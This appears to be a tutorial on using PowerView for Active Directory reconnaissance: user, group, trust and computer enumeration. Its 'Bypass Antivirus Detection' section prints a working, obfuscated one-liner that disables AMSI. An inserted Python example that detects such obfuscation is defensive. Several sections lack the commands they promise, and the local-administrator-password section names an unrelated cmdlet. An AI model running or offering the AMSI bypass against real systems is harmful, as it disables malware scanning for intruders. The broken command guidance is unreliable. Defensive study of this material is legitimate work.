PowerView is a PowerShell script developed by Will Schroeder and available as part of the PowerSploit framework. It is primarily used for performing domain reconnaissance in Windows environments.

It provides various capabilities to gather information about Active Directory (AD) domains, including user accounts, group memberships, domain controllers, trusts, and more.

PowerView’s main purpose is to assist in the discovery and enumeration of Active Directory environments.

Here are some of its key features and functionalities:

  1. User Enumeration: The tool can help you identify users within the domain, including disabled and locked-out accounts. It provides details such as usernames, security identifiers (SIDs), and group memberships.
  2. Group Enumeration: It allows you to list domain groups, their members, and nested group memberships. This is crucial for understanding the permissions and access control within an Active Directory environment.
  3. Computer Enumeration: It helps identify computers within the domain, their operating systems, and other relevant information. This is valuable for identifying potential targets for further analysis or exploitation.
  4. Shares and Permissions: It finds shared folders and their associated permissions. This can be helpful in identifying sensitive data and potential security misconfigurations.
  5. Local Admin Rights: It assists in identifying machines where a specific user has local administrator rights, which can be crucial for lateral movement during penetration testing.
  6. Session Enumeration: It can enumerate active sessions on domain-joined machines, helping you understand who is currently logged in and what they are doing.
  7. ACL Enumeration: It allows you to list the permissions associated with objects in Active Directory, providing insights into potential security vulnerabilities.

Obtain PowerView

Download the PowerSploit framework from the GitHub repository (https://github.com/PowerShellMafia/PowerSploit) or clone the repository using Git.

Launch a PowerShell session


Import the PowerView module using the following command:

Import-Module <Path to PowerView.ps1>

Bypass Antivirus Detection

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
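
The obfuscation in the line above (backticks, string concatenation, the -f format operator) is what log-based detection has to normalize before it can match anything. As an added example, not part of the original article or of PowerSploit, this Python code normalizes script-block text and flags the AMSI internals and the PowerView cmdlets named on this page. It assumes the input is the script text recorded by PowerShell script block logging (event ID 4104); the indicator list, function names and sample lines are constructed for illustration.

```python
import re

# Strings worth alerting on: the AMSI internals the one-liner touches and the
# PowerView cmdlets named on this page ("get-netgroup" also covers
# Get-NetGroupMember). All lowercase; matching is case-insensitive.
INDICATORS = ["amsiutils", "amsiinitfailed", "get-netuser", "get-netgroup",
              "get-netdomaintrust", "find-netcomputer", "invoke-userimpersonation"]

STR = r"(?:'[^']*'|\"[^\"]*\")"                      # one quoted string literal
CONCAT = re.compile(rf"({STR})\s*\+\s*({STR})")      # 'a'+'b'
PAREN = re.compile(rf"\(\s*({STR})\s*\)")            # ('ab')
# "{1}{0}" -f 'x','y', resolved only once every argument is a plain literal
FORMAT = re.compile(rf"({STR})\s*-f\s*({STR}(?:\s*,\s*{STR})*)(?!\s*[,+])", re.I)

def _fmt(m):
    args = [a[1:-1] for a in re.findall(STR, m[2])]
    pick = lambda p: args[int(p[1])] if int(p[1]) < len(args) else p[0]
    return "'" + re.sub(r"\{(\d+)\}", pick, m[1][1:-1]) + "'"

def normalize(script):
    """Undo backtick, concatenation and -f obfuscation. Output is for
    matching only and is not valid PowerShell."""
    text = script.replace("`", "")
    for _ in range(32):                              # bounded fixed-point loop
        before = text
        text = CONCAT.sub(lambda m: "'" + m[1][1:-1] + m[2][1:-1] + "'", text)
        text = PAREN.sub(r"\1", text)
        text = FORMAT.sub(_fmt, text)
        if text == before:
            break
    return text

def scan(script_block):
    """Return the indicators found in one script-block text value."""
    text = normalize(script_block).lower()
    return [i for i in INDICATORS if i in text]

# Constructed sample script-block texts (not real logs).
SAMPLES = [
    "G`eT-N`etUs`er -SamAccountName alice",
    "& ('Get-Net'+'Domain'+'Trust') -Domain example.local",
    # fragment in the style of the one-liner above, not a working command
    "\"{0}{2}{1}\" -f('a'+'msi'),'d',('I'+'nitF'+'aile')",
    "Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan(s), "<-", s)
```

Substring matching on normalized text is deliberately broad; in production the same normalization would feed a rule engine with allow-lists for sanctioned administrative scripts.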

Enumerate Domain Controllers

PowerView provides several commands to gather domain information.

Enumerate all user accounts

This command shows the list of user accounts in the domain. Additional parameters can be used to filter the list based on various criteria.


Enumerate all groups in the domain

This command shows the list of groups in the domain.

Additional parameters can be used to filter the list based on various criteria.


Enumerate domain controllers

This command shows the list of domain controllers in the domain.


Enumerate domain trusts

This will retrieve a list of all domain trusts in the current domain.

To retrieve trust information about a specific domain, you can specify the domain name using the -Domain parameter:


Get-NetDomainTrust is a cmdlet that can be used to retrieve trust relationships between domains within an Active Directory forest.

It provides information about the directionality and type of trust which can be useful for understanding the structure and security of the forest.

Explore User and Group Information

PowerView allows you to query user and group information in detail.

Here are some commands you can use:

Get information about a specific user

Get-NetUser -SamAccountName <username>

Get the members of a specific group – This command shows the list of members in a specified group.

Get-NetGroupMember -GroupName <groupname>

Get information about a specific group – This command lists groups in the domain; here the -GroupName parameter filters the list to the named group. Additional parameters can be used to filter the list based on various criteria.

Get-NetGroup -GroupName <groupname>

Search for Specific Objects

PowerView offers searching capabilities to find specific objects within the domain.

Search for a specific computer

Find-NetComputer -Ping -HostName <computername>

Perform Delegated User Hunting

Identify user accounts with delegated permissions.


Extract Local Administrator Passwords

Retrieve local administrator passwords stored on domain-joined systems.

This requires administrative privileges or access to the Active Directory database.

Invoke-UserImpersonation -Target <targethostname>

These are just a few examples of what PowerView can do for domain reconnaissance.


In conclusion, PowerView is a powerful tool that can assist in domain enumeration. Properly identifying and securing domain resources is critical to maintaining a secure system and protecting sensitive information.


RFS (36)
